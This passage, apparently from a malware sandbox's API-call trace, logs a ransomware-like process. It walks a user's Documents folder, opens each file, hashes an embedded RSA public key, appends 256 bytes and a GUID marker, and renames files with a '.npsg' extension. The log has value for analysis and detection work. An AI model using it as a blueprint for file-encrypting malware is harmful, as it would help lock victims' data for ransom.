KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.473] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.473] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.473] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.475] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.475] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.475] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.475] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.475] GetLastError () returned 0x0 [0237.475] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.475] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.475] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.475] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.475] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.475] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.475] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.476] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1b3f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.476] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.476] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.476] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.476] CloseHandle (hObject=0x644) returned 1 [0237.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0237.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0237.478] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\dF-4SRgpmpphXDcG.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\df-4srgpmpphxdcg.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\dF-4SRgpmpphXDcG.xlsx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\df-4srgpmpphxdcg.xlsx.npsg")) returned 1 [0237.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.479] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.480] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3daee60, ftCreationTime.dwHighDateTime=0x1d5bdfc, ftLastAccessTime.dwLowDateTime=0xe17743b0, ftLastAccessTime.dwHighDateTime=0x1d5b5b7, ftLastWriteTime.dwLowDateTime=0xe17743b0, ftLastWriteTime.dwHighDateTime=0x1d5b5b7, nFileSizeHigh=0x0, nFileSizeLow=0x9a87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gTLi.odp", cAlternateFileName="")) returned 1 [0237.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.480] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\gTLi.odp") returned=".odp" [0237.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\gTLi.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\gtli.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.482] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=39559) returned 1 [0237.483] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.485] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9a61, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.485] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.487] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.487] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.487] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x9a87, lpOverlapped=0x0) returned 1 [0237.488] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.488] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.489] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.489] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.489] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.490] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.490] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.490] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.490] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.490] GetLastError () returned 0x0 [0237.490] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.490] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.490] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.490] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.490] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.490] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.490] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9a90) returned 0x3b83cd0 [0237.491] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.491] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34091b8 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005f0 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409200 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400608 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.491] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.492] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400650 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400638 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.493] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x9a87, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.493] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.493] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.493] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.494] CloseHandle (hObject=0x644) returned 1 [0237.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.500] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b83cd0 [0237.500] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\gTLi.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\gtli.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\gTLi.odp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\gtli.odp.npsg")) returned 1 [0237.502] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x175d9200, ftCreationTime.dwHighDateTime=0x1d5c16a, ftLastAccessTime.dwLowDateTime=0xf955a70, ftLastAccessTime.dwHighDateTime=0x1d5b9f5, ftLastWriteTime.dwLowDateTime=0xf955a70, ftLastWriteTime.dwHighDateTime=0x1d5b9f5, nFileSizeHigh=0x0, nFileSizeLow=0x47fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KxCbm.odp", cAlternateFileName="")) returned 1 [0237.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.503] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\KxCbm.odp") returned=".odp" [0237.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\KxCbm.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\kxcbm.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.504] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=18428) returned 1 [0237.504] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.507] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x47d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.507] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.509] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x47fc, lpOverlapped=0x0) returned 1 [0237.510] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.510] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.510] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.510] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.511] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.511] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.511] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.512] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.512] GetLastError () returned 0x0 [0237.512] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.512] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.512] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.512] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.512] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.512] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400668 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400650 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, 